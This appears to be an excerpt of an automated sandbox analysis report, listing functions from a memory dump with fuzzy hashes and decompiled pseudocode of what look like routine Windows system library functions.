API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: f5bc5da2c87873bd1e5e5a86aa53401ec6e36ad40efe3b95b8277fe5a7493e68
Instruction ID: 1ee8ac392fc0321e36d1a9d2c2a487dc9d8740eb3ac5280c74f881d8b5044e73
Opcode Fuzzy Hash: f5bc5da2c87873bd1e5e5a86aa53401ec6e36ad40efe3b95b8277fe5a7493e68
Instruction Fuzzy Hash: 664144B1D0052D9BDB21EA58CC80FEEB77CAB54718F0045A5EB09E7241DB309F888F95

Uniqueness

Uniqueness Score: -1.00%

Function 018D05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E018D05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018D07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01849730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E018CA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E018CA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E018D1293(_t79, _v40, E018D07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01827D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E018C138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x018d05c5
0x018d05ca
0x018d05d3
0x018d06db
0x018d06db
0x018d06dd
0x018d06e3
0x018d06e3
0x018d05dd
0x018d05e7
0x018d05f6
0x018d0600
0x018d0607
0x018d0610
0x018d0615
0x018d061a
0x018d061c
0x018d061e
0x018d0624
0x018d0625
0x018d0627
0x018d0628
0x018d0631
0x018d0640
0x018d064d
0x018d0654
0x018d0654
0x018d0631
0x018d066d
0x018d0674
0x00000000
0x00000000
0x018d0692
0x018d069e
0x018d06b0
0x018d06a0
0x018d06a9
0x018d06a9
0x018d06b8
0x018d06d6
0x018d06d6
0x00000000

Strings

`, xrefs: 018D0633

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: ceb26c74c9b9f07d713ab8ecff0ab9c37024735518c3c432c8330783feea8335
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 2E31F73270434AABE720DE29DD85F9B7BD9EBC4754F144129FA54DB280E770EA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01883884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01883884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01849650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01824620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01849650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01883893
0x01883896
0x01883899
0x0188389f
0x018838a0
0x018838a4
0x018838a9
0x018838ac
0x018838ad
0x018838ae
0x018838af
0x018838b1
0x018838b4
0x018838bb
0x018838bc
0x018838bd
0x018838c4
0x018838c8
0x018838ca
0x018838ca
0x018838d5
0x0188393e
0x01883940
0x01883942
0x01883952
0x01883954
0x01883961
0x01883961
0x01883967
0x0188396e
0x0188396e
0x01883947
0x0188394c
0x00000000
0x0188394c
0x018838ea
0x018838ee
0x018838f8
0x018838f9
0x018838ff
0x01883900
0x01883902
0x01883903
0x0188390b
0x0188390f
0x01883950
0x00000000
0x01883950
0x01883915
0x0188391d
0x0188391d
0x01883922
0x01883926
0x00000000
0x01883928
0x0188392b
0x0188392b
0x01883935
0x01883937
0x01883937
0x00000000
0x01883935
0x01883926
0x018838f0
0x00000000

Strings

BinaryName, xrefs: 018838B4

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 70bcec31d3b22b9e87cde38178a0ae57f846c459ac52ed6335931d53ec1f5a81
Instruction ID: a63733b794bc352870be3af15bcbeed60fdb4514753e578a266aafb3730732e9
Opcode Fuzzy Hash: 70bcec31d3b22b9e87cde38178a0ae57f846c459ac52ed6335931d53ec1f5a81
Instruction Fuzzy Hash: 7831C23290051AAFEB16EA5CCD45D6BFB74FB45B20F114169ED15E7251D630DF00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0183D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x18fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01824120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0184B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018495D0();
					L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0183d29c
0x0183d2a6
0x0183d2b1
0x0183d2b5
0x0183d2b6
0x0183d2bc
0x0183d2bd
0x0183d2be
0x0183d2bf
0x0183d2c2
0x0183d2c4
0x0183d2cc
0x0183d384
0x0183d34b
0x0183d34f
0x0183d350
0x0183d351
0x0183d35c
0x0183d35c
0x0183d2d6
0x0183d2da
0x0183d2e1
0x0183d361
0x0183d369
0x0183d36d
0x0183d2e3
0x0183d2e3
0x0183d2e3
0x0183d2e5
0x0183d2ed
0x0183d2f5
0x0183d2fa
0x0183d302
0x0183d303
0x0183d30b
0x0183d30f
0x0183d313
0x0183d318
0x0183d31c
0x0183d320
0x0183d379
0x0183d37d
0x00000000
0x00000000
0x0187affe
0x0187b001
0x0187b011
0x00000000
0x0183d322
0x0183d322
0x0183d330
0x0183d337
0x0183d35d
0x0183d339
0x0183d33f
0x0183d38c
0x0183d38c
0x0183d33f
0x0183d349
0x00000000
0x0183d349

Strings

@, xrefs: 0183D303

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 836f43df5213262747908a8642040db9ea05300b625756c59cba795f45e865dd
Instruction ID: add445ef95ad94d15a721f36594f3d773d7f5ca91f8a220a4810a6f730e69974
Opcode Fuzzy Hash: 836f43df5213262747908a8642040db9ea05300b625756c59cba795f45e865dd
Instruction Fuzzy Hash: 1E315CB15083099FD321DF68C98096BBBE8EBD5754F440A2EF994C3251E634DE08CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01811B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01811B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0184BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0184A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0184A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01824620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01811b8f
0x01811b9a
0x01811b9c
0x01811b9e
0x01811ba3
0x01867010
0x01867010
0x00000000
0x01811ba9
0x01811ba9
0x01811bae
0x00000000
0x01811bc5
0x01811bca
0x01811bcf
0x01811bd0
0x01811bd1
0x01811bd2
0x01811bd6
0x01811bdc
0x01811be0
0x01866ffc
0x01867000
0x00000000
0x01867006
0x01867009
0x01867009
0x01811be6
0x01811bec
0x01811c0b
0x01811c0b
0x01811c0c
0x01811c11
0x01811c12
0x01811c15
0x01811c1b
0x01811c1f
0x01811c31
0x01811c33
0x01867026
0x01867026
0x01811c21
0x01811c24
0x01811c24
0x01811bee
0x01811bee
0x01811bf2
0x01811c3a
0x01811bf4
0x01811bf4
0x01811c05
0x01811c05
0x01811c09
0x01811c3e
0x00000000
0x00000000
0x00000000
0x01811c09
0x01811bec
0x01811be0
0x01811bae
0x01811c2e

Strings

WindowsExcludedProcs, xrefs: 01811BC5

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 4fd271cfac8609eee2cf72b525507a071cdbb4e8e064a7c8c02c54820e306c1c
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 5821F53B50022DABEB229AADC844F5BBBADAF90B54F054425FB04CB204DA30DF0097F1

Uniqueness

Uniqueness Score: -1.00%

Function 0182F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0182F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0182f71d
0x0182f722
0x0182f726
0x01874770
0x0182f765
0x0182f769
0x0182f769
0x0182f732
0x0187477a
0x00000000
0x0187477a
0x0182f738
0x0182f73a
0x0182f73c
0x0182f73f
0x0182f746
0x0182f778
0x0182f7a9
0x0182f7a9
0x0182f754
0x0182f75a
0x0182f75d
0x0182f75f
0x0182f761
0x0182f76f
0x0182f771
0x0182f771
0x0182f76f
0x0182f763
0x00000000
0x0182f763
0x0182f77d
0x0182f7a3
0x0182f7a5
0x00000000
0x0182f7a5
0x0182f77f
0x0182f782
0x0182f784
0x0182f786
0x00000000
0x00000000
0x00000000
0x0182f788
0x0182f748
0x0182f74d
0x0182f78d
0x0182f793
0x0182f7b7
0x0182f7bc
0x00000000
0x0182f7bc
0x0182f798
0x00000000
0x00000000
0x0182f79d
0x0182f7b0
0x00000000
0x0182f7b0
0x0182f79f
0x00000000
0x0182f74f
0x0182f74f
0x00000000
0x0182f74f

Strings

Actx , xrefs: 0182F73F

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 7a5481fd7741a0c7565359ccd95ed56a9473df90ec4acd9ec6ce62a3da997f37
Instruction ID: 2772966dde20d6bbbb70118d47d4d92b3936ed06e9ce045a9ddfaa421e1dd0d7
Opcode Fuzzy Hash: 7a5481fd7741a0c7565359ccd95ed56a9473df90ec4acd9ec6ce62a3da997f37
Instruction Fuzzy Hash: B21190353046A68FEB274E1D899073676B5EB85768F24453AEB61CB391DA70CAC0C340

Uniqueness

Uniqueness Score: -1.00%

Function 018B8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E018B8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x18e0d50);
				E0185D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01895720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0185DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0185DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0185D130(_t34, _t39, _t40);
			}

0x018b8df1
0x018b8df1
0x018b8df1
0x018b8df1
0x018b8df1
0x018b8df1
0x018b8df3
0x018b8df8
0x018b8dfd
0x018b8e00
0x018b8e0e
0x018b8e2a
0x018b8e36
0x018b8e38
0x018b8e3c
0x018b8e46
0x018b8e46
0x018b8e36
0x018b8e50
0x018b8e56
0x018b8e59
0x018b8e5c
0x018b8e60
0x018b8e67
0x018b8e6d
0x018b8e73
0x018b8e74
0x018b8eb1
0x018b8ebd

Strings

Critical error detected %lx, xrefs: 018B8E21

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 4ef89f926bb99af8dd3d5ade4a695502d9f6446ae17a5ab9ace58f22b67edb80
Instruction ID: 01be78bd8ab25333044e39b37ab46e215cfa871c977c364efe8776227310cb71
Opcode Fuzzy Hash: 4ef89f926bb99af8dd3d5ade4a695502d9f6446ae17a5ab9ace58f22b67edb80
Instruction Fuzzy Hash: 361172B1D00349EAEF29CFA889457DCBBB4EB05314F24426EE928AB382C3344702CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0189FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0189FF60

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 169b6eb327b038381589a22289599e2ed7eb659eb27b6e1cc8b470b608072508
Instruction ID: ef2c7037c9f4c868faa8daa4549f539f56016e1ad171a22a14ca120e59b6e637
Opcode Fuzzy Hash: 169b6eb327b038381589a22289599e2ed7eb659eb27b6e1cc8b470b608072508
Instruction Fuzzy Hash: 5211E171510544EFDF26DB58C848F98BBB1FB04704F188048E608E72A1CB399B80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018D5BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1c0bde0e03e506068dd8461f7c0b3411297906a9e1838604379dd37a6a3186
Instruction ID: dcfaf3d7b39db97889adaac19be0b4ef824d900d9ee7d2d759ec0a04f673ee61
Opcode Fuzzy Hash: 2b1c0bde0e03e506068dd8461f7c0b3411297906a9e1838604379dd37a6a3186
Instruction Fuzzy Hash: 0B422A75900729CFDB24CF68C880BA9BBB1FF45304F2581AAD94DEB242E7759A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01824120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873f33ddcee3cd45cb653f6b2bde01f02c50fb2dc75a66d802ea3160564be470
Instruction ID: 819becc03994252c0cca93419ca0ecc4027a10bf40855c5ea39e5cfbf0baba42
Opcode Fuzzy Hash: 873f33ddcee3cd45cb653f6b2bde01f02c50fb2dc75a66d802ea3160564be470
Instruction Fuzzy Hash: 3DF18F74608621CFD726CF19C480A7ABBE5FF98714F14492EF986CB251E734DA81CB62

Uniqueness

Uniqueness Score: -1.00%

Function 018320A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48019f7d3ab43cbaf05beabd795cba9bbf6b8b279a105f2b92557e5e12fcfca7
Instruction ID: bf4ce968075b2c5dd349f5222836ed41d08f9a74432bf8c1a1a1520debca1082
Opcode Fuzzy Hash: 48019f7d3ab43cbaf05beabd795cba9bbf6b8b279a105f2b92557e5e12fcfca7
Instruction Fuzzy Hash: 91F1E431A083459FD726CF2CC84076ABBE2AFC5324F18852DE999DB291D734DA41CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0181D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625f6e8c2cc8adfb32dbb450aa89bde1562cddeebe78fcec91004a5347a144c1
Instruction ID: 2532596308a6dce520d9cf4fafc33d4ed92d54d90ae77e8c251a82526d1ff7bc
Opcode Fuzzy Hash: 625f6e8c2cc8adfb32dbb450aa89bde1562cddeebe78fcec91004a5347a144c1
Instruction Fuzzy Hash: 7DE1D332B002598FEB35DF5CC988B69B7B9BF45308F040699DA09D7295D7349B81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0181849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9605436983c4e32e078c344e11179d62ce670c50b58012cbba9a69e0fa402c
Instruction ID: 007bcd76f0bcb8cee402fd4eeaccae98472343fe7536413d1f0c16b239ebf425
Opcode Fuzzy Hash: bf9605436983c4e32e078c344e11179d62ce670c50b58012cbba9a69e0fa402c
Instruction Fuzzy Hash: B4B18C71E00219DFDB25CFA9C984AADBBB9FF5A308F10452DE505EB249DB70AA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0183513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eccfbef231851977e518121a98f22b5aaf9f473adfdea1537f0cc048fb9f69d8
Instruction ID: b9b90631ba90a47f381ce2fcd52da522789e691c1ac764d1a722cc0340909b77
Opcode Fuzzy Hash: eccfbef231851977e518121a98f22b5aaf9f473adfdea1537f0cc048fb9f69d8
Instruction Fuzzy Hash: 2BC114755087818FE355CF28C480A5AFBF1BF88304F18496EF9998B352D771EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018303E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818f6d1fa3e9ca82bc4d6fc64955b40ca303fc7bd38c1f122f77dfb41a5655db
Instruction ID: 1d57a9ef364f0435c792c260bf4708c89aaa96a6b51460014561d2812e3a7a5b
Opcode Fuzzy Hash: 818f6d1fa3e9ca82bc4d6fc64955b40ca303fc7bd38c1f122f77dfb41a5655db
Instruction Fuzzy Hash: 65910631E00259AFEB329A6CC844BAE7FA4AB45728F190265FA51EB2D1D774DF40C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 0180C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42f35d16d960d9455919471a346ad4d9114011fb733b14407dda7f8b673cb23
Instruction ID: 0c2df26501f1c56b5566b0db894990f05ea0bfbecba10896795fbce0b0d5c758
Opcode Fuzzy Hash: a42f35d16d960d9455919471a346ad4d9114011fb733b14407dda7f8b673cb23
Instruction Fuzzy Hash: 5081A3756042068BEB22DE58C884B3BB7E4EB84354F14495EEE45DB251E330EF44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0189B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f99973dd9f4f343da03bbbf52b71270ebecf5f343154795341b15db8337324
Instruction ID: c399f514b198343890ca57779da2cdd3aaffea54324bcb6beeb03548f54ab0cd
Opcode Fuzzy Hash: 13f99973dd9f4f343da03bbbf52b71270ebecf5f343154795341b15db8337324
Instruction Fuzzy Hash: 96710F32200706AFEB32CF18D844F66BBE5EB44724F194528E656DB6E1EB74EA40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01886DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: da030d1697ab215f316595053bcc23ae50ae6e87ce32f37c870b9d89826301a9
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 81716E71A00219EFDB11EFA9C984AEEBBB9FF48714F104069E505E7250EB34EB41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018052A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 603a2ae9cf6cccbf42a1aadf6ffd286bc6b15a2c37fa4a3698e889209bff1fc4
Instruction ID: f4d145948bd5b124f189b763365d62b8d2ecf01f363f3431fa507decb73af72c
Opcode Fuzzy Hash: 603a2ae9cf6cccbf42a1aadf6ffd286bc6b15a2c37fa4a3698e889209bff1fc4
Instruction Fuzzy Hash: D751DA31205346ABE322DF68C840B27BBA8FF64714F14091EF599C7691E774EA40CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01832AE4, Relevance: .2, Instructions: 159COMMON

